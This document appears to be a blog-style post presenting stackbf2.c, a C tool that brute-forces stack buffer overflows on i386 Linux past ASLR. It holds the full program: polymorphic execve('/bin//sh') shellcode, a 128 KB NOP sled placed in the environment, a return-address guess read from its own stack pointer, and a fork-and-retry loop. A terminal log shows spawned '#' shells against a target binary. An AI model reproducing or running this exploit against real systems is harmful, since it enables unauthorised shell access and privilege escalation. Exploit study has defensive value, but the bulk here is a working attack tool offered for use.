stackbf2.c
This is a newer version of stackbf. Instead of supplying the return address by hand, it reads the brute-forcer's own stack pointer with:
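/*
 * Return the current stack pointer; it is used as the return-address guess.
 *
 * The original had no return type and no return statement and simply relied
 * on %eax still holding %esp when the (inlined) function "returned", which is
 * undefined behaviour that only works by accident of code generation.  Read
 * the register through an output operand instead.  On x86-64 this yields the
 * low 32 bits of %rsp, which is all the 32-bit payload can carry anyway; on
 * other architectures the address of a local stands in so the tool builds.
 */
static inline unsigned int getesp(void)
{
    unsigned int sp;
#if defined(__i386__) || defined(__x86_64__)
    __asm__ volatile ("mov %%esp, %0" : "=r" (sp));
#else
    sp = (unsigned int)(unsigned long)&sp;
#endif
    return sp;
}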
as the return address, because the parent's own stack pointer turns out to be an accurate enough guess for where the child's stack will be.
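/*
 * stackbf2.c -- stack brute forcer by Gunslinger_ yudha.gunslinger@gmail.com
 *
 * Version 2 of stackbf.c.  The difference from version 1 is that we no longer
 * supply a return address by hand: getesp() reads this process's own stack
 * pointer and that value is used as the guess.  The target is started with a
 * very similar environment, so its stack tends to land near the same place,
 * and the ~128 KB NOP sled that precedes the shellcode in the environment
 * absorbs the remaining difference.  The child is re-spawned until one run
 * exits cleanly, which is taken to mean "the shellcode ran and the spawned
 * shell was exited".
 *
 * i386 Linux only: the shellcode uses int $0x80 and the addresses are 32-bit.
 *
 * Original assembly of the shellcode.  The byte string below is a polymorphic
 * encoding of it that hides characters such as "\xcd\x80" ("int $0x80"):
 *
 *     .global _start
 *     _start:
 *
 *         xor %eax, %eax
 *         xor %ebx, %ebx
 *         xor %ecx, %ecx
 *         xor %edx, %edx
 *
 *         mov $0xb, %al
 *         push %ebx
 *         push $0x68732f2f
 *         push $0x6e69622f
 *         mov %esp, %ebx
 *         xor %edx, %edx
 *         xor %edx, %edx
 *         push %ebx
 *         int $0x80
 *
 *         inc %eax
 *         int $0x80
 */

/* fork/execle/waitpid/_exit are POSIX, not ISO C. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define NOP 0x90
/* Length of the environment variable carrying the NOP sled + shellcode (~128 KB). */
#define ENV_LEN 128000
/* Exit status the child uses to tell the parent that execle() itself failed. */
#define EXEC_FAILED 127

/*
 * Return the current stack pointer; it is used as the return-address guess.
 *
 * The original had no return type and no return statement and simply relied
 * on %eax still holding %esp when the (inlined) function "returned", which is
 * undefined behaviour that only works by accident of code generation.  Read
 * the register through an output operand instead.  On x86-64 this yields the
 * low 32 bits of %rsp, which is all the 32-bit payload can carry anyway; on
 * other architectures the address of a local stands in so the tool builds.
 */
static inline unsigned int getesp(void)
{
    unsigned int sp;
#if defined(__i386__) || defined(__x86_64__)
    __asm__ volatile ("mov %%esp, %0" : "=r" (sp));
#else
    sp = (unsigned int)(unsigned long)&sp;
#endif
    return sp;
}

/* Polymorphic (self-decoding) execve("/bin//sh") shell; see the header comment. */
char shellcode[] =
    "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x35\x80\xe9\x01"
    "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\xfe"
    "\x66\x07\xe5\x40\x88\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3"
    "\xbe\x18\x66\x07\x66\xfe\x88\x02\xb5\x75\x02\xb5";

/*
 * Parse a positive decimal byte count from the command line.
 *
 * Replaces the unchecked atoi(): "abc", "", "12x", "0" and negative values
 * are rejected instead of silently turning into a zero-length or huge
 * allocation.  Returns 0 and stores the value in *out on success, -1 otherwise.
 */
static int parse_size(const char *text, size_t *out)
{
    char *end;
    errno = 0;
    long value = strtol(text, &end, 10);
    if (end == text || *end != '\0' || errno == ERANGE || value <= 0) {
        return -1;
    }
    *out = (size_t)value;
    return 0;
}

int main(int argc, char **argv)
{
    /*
     * Kept on the stack on purpose: besides being the child's environment,
     * this 128 KB frame moves our own %esp down by roughly the amount the
     * child's stack is pushed down by the same environment block, which is
     * presumably what makes getesp() a usable guess -- TODO confirm.
     */
    char env_var[ENV_LEN];
    char *env[2] = { env_var, NULL };

    if (argc < 3) {
        printf("\nStack Brute Force");
        printf("\nProgrammer : Gunslinger_");
        printf("\nUsage: %s <application> <payload_size>\n\n", argv[0]);
        exit(1);
    }

    const char *application = argv[1];
    size_t payload_size;
    if (parse_size(argv[2], &payload_size) != 0) {
        fprintf(stderr, "[-] payload_size must be a positive integer, got '%s'\n", argv[2]);
        exit(1);
    }

    size_t sc_len = strlen(shellcode);
    /* Shellcode plus the terminating NUL must fit inside the variable. */
    if (sc_len + 1 > ENV_LEN) {
        fprintf(stderr, "[-] shellcode does not fit in the environment variable\n");
        exit(1);
    }

    /* Read the guess once so the address we print is the one we actually use. */
    unsigned int ret_addr = getesp();

    printf("[*] Using return address 0x%x \n", ret_addr);
    printf("[*] Environment variable %d kb\n", ENV_LEN / 1000);
    printf("[*] Shellcode size %zu bytes\n", sc_len);

    /* The guess travels as an argv string, so a zero byte would cut it short. */
    if (memchr(&ret_addr, 0, sizeof ret_addr) != NULL) {
        fprintf(stderr, "[!] return address contains a NUL byte; the payload will be truncated\n");
    }

    /* NOP sled with the shellcode at the very end, NUL-terminated for envp. */
    memset(env_var, NOP, ENV_LEN);
    memcpy(env_var + ENV_LEN - sc_len - 1, shellcode, sc_len);
    env_var[ENV_LEN - 1] = '\0';

    /*
     * The payload is the guess repeated.  Round up to whole words (the original
     * loop did so implicitly) and add one byte for the string terminator; the
     * original allocated exactly payload_size bytes and then wrote the
     * rounding overflow plus a 4-byte terminator past the end of the buffer.
     */
    size_t words = (payload_size + sizeof ret_addr - 1) / sizeof ret_addr;
    size_t buf_len = words * sizeof ret_addr + 1;
    char *buffer = malloc(buf_len);
    if (buffer == NULL) {
        perror("malloc");
        exit(1);
    }
    for (size_t i = 0; i < words; i++) {
        memcpy(buffer + i * sizeof ret_addr, &ret_addr, sizeof ret_addr);
    }
    buffer[buf_len - 1] = '\0';

    /*
     * Re-run the target until it exits with a raw status of 0 (the original
     * stop condition).  A target that exits 0 on its own, without ever
     * running the shellcode, also stops the loop -- this tool cannot tell
     * the two apart.
     */
    unsigned long attempts = 0;
    int status = 0;
    for (;;) {
        pid_t pid = fork();
        if (pid < 0) {
            /* The original fell into waitpid() here with an uninitialised status. */
            perror("fork");
            free(buffer);
            exit(1);
        }
        if (pid == 0) {
            execle(application, application, buffer, (char *)NULL, env);
            /* Only reached if the exec failed; the original exited 0 here,
             * which the parent would have mistaken for success. */
            perror("execle");
            _exit(EXEC_FAILED);
        }
        attempts++;
        if (waitpid(pid, &status, 0) < 0) {
            perror("waitpid");
            free(buffer);
            exit(1);
        }
        /* Note: a target that legitimately exits 127 is indistinguishable from this. */
        if (WIFEXITED(status) && WEXITSTATUS(status) == EXEC_FAILED) {
            fprintf(stderr, "[-] could not execute %s\n", application);
            free(buffer);
            exit(1);
        }
        if (status == 0) {
            break;
        }
    }

    printf("[*] Target exited cleanly after %lu attempt(s)\n", attempts);
    free(buffer);
    return 0;
}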
And here is the program in action, with ASLR fully enabled (randomize_va_space = 2). The `#` prompt that appears after each run is the shell started by the shellcode, which is then left with `exit`:
gunslinger@codebreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408
[*] Using return address 0xbf941d04
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408
[*] Using return address 0xbfeb4a74
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408
[*] Using return address 0xbfdabfc4
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408
[*] Using return address 0xbfbdc7a4
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$